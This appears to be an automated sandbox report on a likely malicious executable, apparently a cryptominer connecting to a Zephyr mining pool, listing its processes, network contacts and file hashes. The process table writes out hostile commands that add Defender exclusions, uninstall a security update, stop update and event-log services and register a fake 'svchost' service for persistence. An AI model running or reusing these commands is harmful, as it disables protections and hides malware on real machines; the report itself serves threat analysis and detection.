Analysis Overview
SHA256
0d7852074aa6b39aa9063384632245092679978969a229f4a97fc8d5bb109ee8
Threat Level: Likely malicious
The file zephyr 100.exe was found to be: Likely malicious.
Malicious Activity Summary
Creates new service(s)
Stops running service(s)
Launches sc.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-07 22:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-07 22:29
Reported
2024-04-07 23:02
Platform
win10-20240319-en
Max time kernel
33s
Max time network
44s
Command Line
Signatures
Creates new service(s)
Stops running service(s)
Launches sc.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
| Process | Command line |
|---|---|
| C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe | "C:\Users\Admin\AppData\Local\Temp\zephyr 100.exe" |
| C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop UsoSvc |
| C:\Windows\system32\wusa.exe | wusa /uninstall /kb:890830 /quiet /norestart |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop WaaSMedicSvc |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop wuauserv |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop bits |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop dosvc |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 |
| C:\Windows\system32\powercfg.exe | C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 |
| C:\Windows\system32\dialer.exe | C:\Windows\system32\dialer.exe |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe delete "svchost" |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe create "svchost" binpath= "C:\ProgramData\RunDLL\taskhostw.exe" start= "auto" |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe stop eventlog |
| C:\Windows\system32\sc.exe | C:\Windows\system32\sc.exe start "svchost" |
| C:\ProgramData\RunDLL\taskhostw.exe | C:\ProgramData\RunDLL\taskhostw.exe |
| C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force |
| \??\c:\windows\system32\sihost.exe | sihost.exe |
| \??\c:\windows\system32\sihost.exe | sihost.exe |
| \??\c:\windows\system32\sihost.exe | sihost.exe |
| \??\c:\windows\system32\sihost.exe | sihost.exe |
| \??\c:\windows\system32\sihost.exe | sihost.exe |
| \??\c:\windows\system32\sihost.exe | sihost.exe |
| C:\Windows\system32\dialer.exe | dialer.exe |
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | ru.zephyr.herominers.com | udp |
| FI | 37.27.63.72:1123 | ru.zephyr.herominers.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zotnjry0.yxf.ps1
| Hash | Value |
|---|---|
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\ProgramData\RunDLL\taskhostw.exe
| Hash | Value |
|---|---|
| MD5 | af3706e699c90f1b5e1fdb5201e6d8ec |
| SHA1 | 2c219b9b3c90140d5e9361b1fa61130ca6dda281 |
| SHA256 | 0d7852074aa6b39aa9063384632245092679978969a229f4a97fc8d5bb109ee8 |
| SHA512 | 1bfb95adc9aa0a3ac340cda9608bdc0c824fd82f61b63929c4dfaabe290b0cd8ffa05fd51886dd46a05a6603eebeb9f2a54c9eb3df146fda83f8720ce286789e |